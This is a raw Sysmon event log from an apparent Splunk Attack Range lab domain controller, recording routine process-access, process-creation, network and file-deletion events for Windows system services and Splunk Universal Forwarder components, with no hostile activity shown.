12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.827{266CAFBE-6627-6064-6501-00000000AE01}68606104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.617{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53694-false10.0.1.12-8000- 10341000x800000000000000010446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.656{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.358{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=252D9492507032C0EA3F026BE2B92F41,SHA256=BA5F65344F55CD05D46B5D469C36B235E63C2405CA0B4E961FA60CD3050D17F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.171{266CAFBE-6627-6064-6401-00000000AE01}70206836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.015{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:08.436{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8874A0844B8903B6C21563B5FF4695CB,SHA256=E0F8D28651D1333D34FB86D348C1F397D9110F373DC9D63BF3112A1CAFE3FD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.482{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84097A7F3CEED5BE625852CE3EE2688,SHA256=ACB4C192B3A1BDDA97499BB88D82093C837E69B277FE60BA5FC9D315057D407B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 